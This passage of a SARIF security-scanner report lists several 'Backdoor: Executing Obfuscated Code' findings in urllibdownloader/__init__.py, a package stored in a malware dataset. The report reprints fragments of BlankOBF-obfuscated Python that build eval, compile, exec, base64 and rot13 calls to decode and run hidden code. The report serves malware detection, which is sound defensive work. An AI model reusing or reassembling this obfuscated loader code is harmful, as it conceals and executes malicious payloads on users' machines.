                      "text": "35,'\\x72\\157\\164\\x31\\63')\",\"\",_____.__name__))\n    else:\n        if(_____________[-True]==_____(_______(\"b'\\x66\\65\\x73\\x66\\163\\144\\x66\\141\\165\\146\\70\\x35'[-True*4]\",\"\", _____.__name__))):\n            _____________=_____(_______(\"\\x5f\\137\\x5f\\137\\x2e\\144\\145\\x63\\157\\144\\x65\\50\\x5f\\137\\x5f\\137\\x5f\\137\\x5f\\x5f\\x5f\\x5f\\x5f\\137\\137\\x5b\\x3a\\x2d\\x54\\162\\165\\145\\x5d,'\\x75\\x75')\",\"\",_____.__name__))\n        elif (_____________[-True] ==_____(_______(\"b'\\144\\x35\\x73\\146\\x73\\61\\144\\146\\x66\\150\\163\\x64\\x38'[-True*4]\",\"\", _____.__name__))):_____________=_____(_______(\"\\x5f\\x5f\\x5f\\x5f\\56\\x64\\x65\\x63\\x6f\\x64\\x65\\50\\x5f\\137\\137",
                      "markdown": "`35,'\\x72\\157\\164\\x31\\63')\",\"\",_____.__name__))\n    else:\n        if(_____________[-True]==_____(_______(\"b'\\x66\\65\\x73\\x66\\163\\144\\x66\\141\\165\\146\\70\\x35'[-True*4]\",\"\", _____.__name__))):\n            _____________=_____(_______(\"\\x5f\\137\\x5f\\137\\x2e\\144\\145\\x63\\157\\144\\x65\\50\\x5f\\137\\x5f\\137\\x5f\\137\\x5f\\x5f\\x5f\\x5f\\x5f\\137\\137\\x5b\\x3a\\x2d\\x54\\162\\165\\145\\x5d,'\\x75\\x75')\",\"\",_____.__name__))\n        elif (_____________[-True] ==_____(_______(\"b'\\144\\x35\\x73\\146\\x73\\61\\144\\146\\x66\\150\\163\\x64\\x38'[-True*4]\",\"\", _____.__name__))):_____________=_____(_______(\"\\x5f\\x5f\\x5f\\x5f\\56\\x64\\x65\\x63\\x6f\\x64\\x65\\50\\x5f\\137\\137`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 2,
            "Confidence": 4
          }
        },
        {
          "rule": {
            "id": "BD000801"
          },
          "message": {
            "text": "Backdoor: Executing Obfuscated Code",
            "id": "BD000801"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "./datasets/malware/dataset1/urllibdownloader-0.0.0.tar.gz/urllibdownloader-0.0.0.tar/urllibdownloader-0.0.0/urllibdownloader/__init__.py"
                },
                "region": {
                  "startLine": 14,
                  "startColumn": 146,
                  "endLine": 14,
                  "endColumn": 166,
                  "snippet": {
                    "text": "\\x5f\\x5f\\137\\137\\x5f\\x5f\\x5f\\x5f\\137\\137\\x5f\\x5f\\137\\137\\x36\\141\\x72\\144\\x76\\x38'[-True*4]\",\"\",_____.__name__))):_____________ = _________(_____________)\n    if not(__________(_____________, ___________)):_____________ = _____(_______(\"\\137\\x5f\\x5f\\x5f\\x2e\\144\\x65\\143\\x6f\\144\\x65\\x28\\x5f\\x5f\\137\\137\\x5f\\x5f\\x5f\\x5f\\x5f\\137\\137\\x5f\\137\\x5b\\72\\55\\x54\\x72\\165\\145\\135,'\\x72\\157\\164\\x31\\63')\",\"\",_____.__name__))\n    else:\n        if(_____________[-True]==_____(_______(\"b'\\x66\\65\\x73\\x66\\163\\144\\x66\\141\\165\\146\\70\\x35'[-True*4]\",\"\", _____.__name__))):\n            _____________=_____(_______(\"\\x5f\\137\\x5f\\137\\x2e\\144\\14",
                    "rendered": {
                      "text": "\\x5f\\x5f\\137\\137\\x5f\\x5f\\x5f\\x5f\\137\\137\\x5f\\x5f\\137\\137\\x36\\141\\x72\\144\\x76\\x38'[-True*4]\",\"\",_____.__name__))):_____________ = _________(_____________)\n    if not(__________(_____________, ___________)):_____________ = _____(_______(\"\\137\\x5f\\x5f\\x5f\\x2e\\144\\x65\\143\\x6f\\144\\x65\\x28\\x5f\\x5f\\137\\137\\x5f\\x5f\\x5f\\x5f\\x5f\\137\\137\\x5f\\137\\x5b\\72\\55\\x54\\x72\\165\\145\\135,'\\x72\\157\\164\\x31\\63')\",\"\",_____.__name__))\n    else:\n        if(_____________[-True]==_____(_______(\"b'\\x66\\65\\x73\\x66\\163\\144\\x66\\141\\165\\146\\70\\x35'[-True*4]\",\"\", _____.__name__))):\n            _____________=_____(_______(\"\\x5f\\137\\x5f\\137\\x2e\\144\\14",
                      "markdown": "`\\x5f\\x5f\\137\\137\\x5f\\x5f\\x5f\\x5f\\137\\137\\x5f\\x5f\\137\\137\\x36\\141\\x72\\144\\x76\\x38'[-True*4]\",\"\",_____.__name__))):_____________ = _________(_____________)\n    if not(__________(_____________, ___________)):_____________ = _____(_______(\"\\137\\x5f\\x5f\\x5f\\x2e\\144\\x65\\143\\x6f\\144\\x65\\x28\\x5f\\x5f\\137\\137\\x5f\\x5f\\x5f\\x5f\\x5f\\137\\137\\x5f\\137\\x5b\\72\\55\\x54\\x72\\165\\145\\135,'\\x72\\157\\164\\x31\\63')\",\"\",_____.__name__))\n    else:\n        if(_____________[-True]==_____(_______(\"b'\\x66\\65\\x73\\x66\\163\\144\\x66\\141\\165\\146\\70\\x35'[-True*4]\",\"\", _____.__name__))):\n            _____________=_____(_______(\"\\x5f\\137\\x5f\\137\\x2e\\144\\14`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 2,
            "Confidence": 4
          }
        },
        {
          "rule": {
            "id": "BD000801"
          },
          "message": {
            "text": "Backdoor: Executing Obfuscated Code",
            "id": "BD000801"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "./datasets/malware/dataset1/urllibdownloader-0.0.0.tar.gz/urllibdownloader-0.0.0.tar/urllibdownloader-0.0.0/urllibdownloader/__init__.py"
                },
                "region": {
                  "startLine": 10,
                  "startColumn": 68,
                  "endLine": 10,
                  "endColumn": 88,
                  "snippet": {
                    "text": "__________):\n    __________=__________.decode()\n    _________=\"\"\n    if not ___________[False]==\"\\40\":\n        ___________=\"\\x20\"+___________\n    for _ in range(_____(\"\\154\\145\\x6e\\50\\137\\x5f\\x5f\\x5f\\137\\x5f\\137\\x5f\\x5f\\137\\x29\")):\n        _________+=_____(\"\\143\\150\\x72\\50\\x6f\\x72\\144\\50\\x5f\\137\\137\\x5f\\x5f\\x5f\\x5f\\x5f\\137\\x5f\\x5b\\137\\x5d\\x29\\136\\157\\162\\x64\\x28\\x5f\\137\\137\\137\\x5f\\137\\x5f\\137\\x5f\\x5f\\x5f\\133\\50\\x6c\\x65\\x6e\\50\\x5f\\x5f\\137\\x5f\\137\\137\\137\\x5f\\137\\137\\137\\51\\40\\55\\40\\124\\x72\\x75\\145\\x2a\\x32\\x29\\40\\53\\40\\124\\162\\x75\\145\\135\\x29\\51\")\n    return (_________,___________)\ndef ____________(_____________):",
                    "rendered": {
                      "text": "__________):\n    __________=__________.decode()\n    _________=\"\"\n    if not ___________[False]==\"\\40\":\n        ___________=\"\\x20\"+___________\n    for _ in range(_____(\"\\154\\145\\x6e\\50\\137\\x5f\\x5f\\x5f\\137\\x5f\\137\\x5f\\x5f\\137\\x29\")):\n        _________+=_____(\"\\143\\150\\x72\\50\\x6f\\x72\\144\\50\\x5f\\137\\137\\x5f\\x5f\\x5f\\x5f\\x5f\\137\\x5f\\x5b\\137\\x5d\\x29\\136\\157\\162\\x64\\x28\\x5f\\137\\137\\137\\x5f\\137\\x5f\\137\\x5f\\x5f\\x5f\\133\\50\\x6c\\x65\\x6e\\50\\x5f\\x5f\\137\\x5f\\137\\137\\137\\x5f\\137\\137\\137\\51\\40\\55\\40\\124\\x72\\x75\\145\\x2a\\x32\\x29\\40\\53\\40\\124\\162\\x75\\145\\135\\x29\\51\")\n    return (_________,___________)\ndef ____________(_____________):",
                      "markdown": "`__________):\n    __________=__________.decode()\n    _________=\"\"\n    if not ___________[False]==\"\\40\":\n        ___________=\"\\x20\"+___________\n    for _ in range(_____(\"\\154\\145\\x6e\\50\\137\\x5f\\x5f\\x5f\\137\\x5f\\137\\x5f\\x5f\\137\\x29\")):\n        _________+=_____(\"\\143\\150\\x72\\50\\x6f\\x72\\144\\50\\x5f\\137\\137\\x5f\\x5f\\x5f\\x5f\\x5f\\137\\x5f\\x5b\\137\\x5d\\x29\\136\\157\\162\\x64\\x28\\x5f\\137\\137\\137\\x5f\\137\\x5f\\137\\x5f\\x5f\\x5f\\133\\50\\x6c\\x65\\x6e\\50\\x5f\\x5f\\137\\x5f\\137\\137\\137\\x5f\\137\\137\\137\\51\\40\\55\\40\\124\\x72\\x75\\145\\x2a\\x32\\x29\\40\\53\\40\\124\\162\\x75\\145\\135\\x29\\51\")\n    return (_________,___________)\ndef ____________(_____________):`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 2,
            "Confidence": 4
          }
        },
        {
          "rule": {
            "id": "BD000801"
          },
          "message": {
            "text": "Backdoor: Executing Obfuscated Code",
            "id": "BD000801"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "./datasets/malware/dataset1/urllibdownloader-0.0.0.tar.gz/urllibdownloader-0.0.0.tar/urllibdownloader-0.0.0/urllibdownloader/__init__.py"
                },
                "region": {
                  "startLine": 3,
                  "startColumn": 274,
                  "endLine": 3,
                  "endColumn": 298,
                  "snippet": {
                    "text": "thub.com/Blank-c/BlankOBF\n_____=eval(\"\\x65\\x76\\141\\154\");_______=_____(\"\\x63\\157\\155\\x70\\151\\x6c\\x65\");______,____=_____(_______(\"\\137\\x5f\\151\\x6d\\160\\157\\x72\\x74\\137\\137\\x28\\47\\142\\x61\\x73\\x65\\x36\\x34\\x27\\x29\",\"\",_____.__name__)),_____(_______(\"\\x5f\\x5f\\151\\155\\x70\\x6f\\x72\\x74\\x5f\\137\\50\\47\\x63\\157\\x64\\x65\\x63\\x73\\x27\\x29\",\"\",_____.__name__));____________________=_____(\"'\\40\\x44\\67\\x56\\x45\\153\\x6d\\x59\\101'\");________,_________,__________,___________=_____(_______(\"\\x65\\170\\145\\143\",\"\",_____.__name__)),_____(_______(\"\\163\\164\\x72\\x2e\\145\\x6e\\143\\x6f\\x64\\145\",\"\",_____.__name__)),_____(_______(\"\\x69\\x73\\x69\\156\\163\\x74",
                    "rendered": {
                      "text": "thub.com/Blank-c/BlankOBF\n_____=eval(\"\\x65\\x76\\141\\154\");_______=_____(\"\\x63\\157\\155\\x70\\151\\x6c\\x65\");______,____=_____(_______(\"\\137\\x5f\\151\\x6d\\160\\157\\x72\\x74\\137\\137\\x28\\47\\142\\x61\\x73\\x65\\x36\\x34\\x27\\x29\",\"\",_____.__name__)),_____(_______(\"\\x5f\\x5f\\151\\155\\x70\\x6f\\x72\\x74\\x5f\\137\\50\\47\\x63\\157\\x64\\x65\\x63\\x73\\x27\\x29\",\"\",_____.__name__));____________________=_____(\"'\\40\\x44\\67\\x56\\x45\\153\\x6d\\x59\\101'\");________,_________,__________,___________=_____(_______(\"\\x65\\170\\145\\143\",\"\",_____.__name__)),_____(_______(\"\\163\\164\\x72\\x2e\\145\\x6e\\143\\x6f\\x64\\145\",\"\",_____.__name__)),_____(_______(\"\\x69\\x73\\x69\\156\\163\\x74",
                      "markdown": "`thub.com/Blank-c/BlankOBF\n_____=eval(\"\\x65\\x76\\141\\154\");_______=_____(\"\\x63\\157\\155\\x70\\151\\x6c\\x65\");______,____=_____(_______(\"\\137\\x5f\\151\\x6d\\160\\157\\x72\\x74\\137\\137\\x28\\47\\142\\x61\\x73\\x65\\x36\\x34\\x27\\x29\",\"\",_____.__name__)),_____(_______(\"\\x5f\\x5f\\151\\155\\x70\\x6f\\x72\\x74\\x5f\\137\\50\\47\\x63\\157\\x64\\x65\\x63\\x73\\x27\\x29\",\"\",_____.__name__));____________________=_____(\"'\\40\\x44\\67\\x56\\x45\\153\\x6d\\x59\\101'\");________,_________,__________,___________=_____(_______(\"\\x65\\170\\145\\143\",\"\",_____.__name__)),_____(_______(\"\\163\\164\\x72\\x2e\\145\\x6e\\143\\x6f\\x64\\145\",\"\",_____.__name__)),_____(_______(\"\\x69\\x73\\x69\\156\\163\\x74`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 2,
            "Confidence": 4
          }
        },
        {
          "rule": {
            "id": "BD000801"
          },
          "message": {
            "text": "Backdoor: Executing Obfuscated Code",
            "id": "BD000801"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "./datasets/malware/dataset1/urllibdownloader-0.0.0.tar.gz/urllibdownloader-0.0.0.tar/urllibdownloader-0.0.0/urllibdownloader/__init__.py"
                },
                "region": {
                  "startLine": 3,
                  "startColumn": 236,
                  "endLine": 3,
                  "endColumn": 256,
                  "snippet": {
                    "text": " Obfuscated with BlankOBF\n# https://github.com/Blank-c/BlankOBF\n_____=eval(\"\\x65\\x76\\141\\154\");_______=_____(\"\\x63\\157\\155\\x70\\151\\x6c\\x65\");______,____=_____(_______(\"\\137\\x5f\\151\\x6d\\160\\157\\x72\\x74\\137\\137\\x28\\47\\142\\x61\\x73\\x65\\x36\\x34\\x27\\x29\",\"\",_____.__name__)),_____(_______(\"\\x5f\\x5f\\151\\155\\x70\\x6f\\x72\\x74\\x5f\\137\\50\\47\\x63\\157\\x64\\x65\\x63\\x73\\x27\\x29\",\"\",_____.__name__));____________________=_____(\"'\\40\\x44\\67\\x56\\x45\\153\\x6d\\x59\\101'\");________,_________,__________,___________=_____(_______(\"\\x65\\170\\145\\143\",\"\",_____.__name__)),_____(_______(\"\\163\\164\\x72\\x2e\\145\\x6e\\143\\x6f\\x64\\145\",\"\",_____.__name__",
                    "rendered": {
                      "text": " Obfuscated with BlankOBF\n# https://github.com/Blank-c/BlankOBF\n_____=eval(\"\\x65\\x76\\141\\154\");_______=_____(\"\\x63\\157\\155\\x70\\151\\x6c\\x65\");______,____=_____(_______(\"\\137\\x5f\\151\\x6d\\160\\157\\x72\\x74\\137\\137\\x28\\47\\142\\x61\\x73\\x65\\x36\\x34\\x27\\x29\",\"\",_____.__name__)),_____(_______(\"\\x5f\\x5f\\151\\155\\x70\\x6f\\x72\\x74\\x5f\\137\\50\\47\\x63\\157\\x64\\x65\\x63\\x73\\x27\\x29\",\"\",_____.__name__));____________________=_____(\"'\\40\\x44\\67\\x56\\x45\\153\\x6d\\x59\\101'\");________,_________,__________,___________=_____(_______(\"\\x65\\170\\145\\143\",\"\",_____.__name__)),_____(_______(\"\\163\\164\\x72\\x2e\\145\\x6e\\143\\x6f\\x64\\145\",\"\",_____.__name__",
                      "markdown": "` Obfuscated with BlankOBF\n# https://github.com/Blank-c/BlankOBF\n_____=eval(\"\\x65\\x76\\141\\154\");_______=_____(\"\\x63\\157\\155\\x70\\151\\x6c\\x65\");______,____=_____(_______(\"\\137\\x5f\\151\\x6d\\160\\157\\x72\\x74\\137\\137\\x28\\47\\142\\x61\\x73\\x65\\x36\\x34\\x27\\x29\",\"\",_____.__name__)),_____(_______(\"\\x5f\\x5f\\151\\155\\x70\\x6f\\x72\\x74\\x5f\\137\\50\\47\\x63\\157\\x64\\x65\\x63\\x73\\x27\\x29\",\"\",_____.__name__));____________________=_____(\"'\\40\\x44\\67\\x56\\x45\\153\\x6d\\x59\\101'\");________,_________,__________,___________=_____(_______(\"\\x65\\170\\145\\143\",\"\",_____.__name__)),_____(_______(\"\\163\\164\\x72\\x2e\\145\\x6e\\143\\x6f\\x64\\145\",\"\",_____.__name__`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 2,
            "Confidence": 4
          }
        },
        {
          "rule": {
            "id": "BD000801"
          },
          "message": {
            "text": "Backdoor: Executing Obfuscated Code",
            "id": "BD000801"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "./datasets/malware/dataset1/urllibdownloader-0.0.0.tar.gz/urllibdownloader-0.0.0.tar/urllibdownloader-0.0.0/urllibdownloader/__init__.py"
                },
                "region": {
                  "startLine": 3,
                  "startColumn": 155,
                  "endLine": 3,
                  "endColumn": 183,
                  "snippet": {
                    "text": "# Obfuscated with BlankOBF\n# https://github.com/Blank-c/BlankOBF\n_____=eval(\"\\x65\\x76\\141\\154\");_______=_____(\"\\x63\\157\\155\\x70\\151\\x6c\\x65\");______,____=_____(_______(\"\\137\\x5f\\151\\x6d\\160\\157\\x72\\x74\\137\\137\\x28\\47\\142\\x61\\x73\\x65\\x36\\x34\\x27\\x29\",\"\",_____.__name__)),_____(_______(\"\\x5f\\x5f\\151\\155\\x70\\x6f\\x72\\x74\\x5f\\137\\50\\47\\x63\\157\\x64\\x65\\x63\\x73\\x27\\x29\",\"\",_____.__name__));____________________=_____(\"'\\40\\x44\\67\\x56\\x45\\153\\x6d\\x59\\101'\");________,_________,__________,___________=_____(_______(\"\\x65\\170\\145\\143\",\"\",_____.__name__)),_",
                    "rendered": {
                      "text": "# Obfuscated with BlankOBF\n# https://github.com/Blank-c/BlankOBF\n_____=eval(\"\\x65\\x76\\141\\154\");_______=_____(\"\\x63\\157\\155\\x70\\151\\x6c\\x65\");______,____=_____(_______(\"\\137\\x5f\\151\\x6d\\160\\157\\x72\\x74\\137\\137\\x28\\47\\142\\x61\\x73\\x65\\x36\\x34\\x27\\x29\",\"\",_____.__name__)),_____(_______(\"\\x5f\\x5f\\151\\155\\x70\\x6f\\x72\\x74\\x5f\\137\\50\\47\\x63\\157\\x64\\x65\\x63\\x73\\x27\\x29\",\"\",_____.__name__));____________________=_____(\"'\\40\\x44\\67\\x56\\x45\\153\\x6d\\x59\\101'\");________,_________,__________,___________=_____(_______(\"\\x65\\170\\145\\143\",\"\",_____.__name__)),_",
                      "markdown": "`# Obfuscated with BlankOBF\n# https://github.com/Blank-c/BlankOBF\n_____=eval(\"\\x65\\x76\\141\\154\");_______=_____(\"\\x63\\157\\155\\x70\\151\\x6c\\x65\");______,____=_____(_______(\"\\137\\x5f\\151\\x6d\\160\\157\\x72\\x74\\137\\137\\x28\\47\\142\\x61\\x73\\x65\\x36\\x34\\x27\\x29\",\"\",_____.__name__)),_____(_______(\"\\x5f\\x5f\\151\\155\\x70\\x6f\\x72\\x74\\x5f\\137\\50\\47\\x63\\157\\x64\\x65\\x63\\x73\\x27\\x29\",\"\",_____.__name__));____________________=_____(\"'\\40\\x44\\67\\x56\\x45\\153\\x6d\\x59\\101'\");________,_________,__________,___________=_____(_______(\"\\x65\\170\\145\\143\",\"\",_____.__name__)),_`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 2,
            "Confidence": 4
          }
        }
      ],
      "columnKind": "utf16CodeUnits"
    }
  ]
}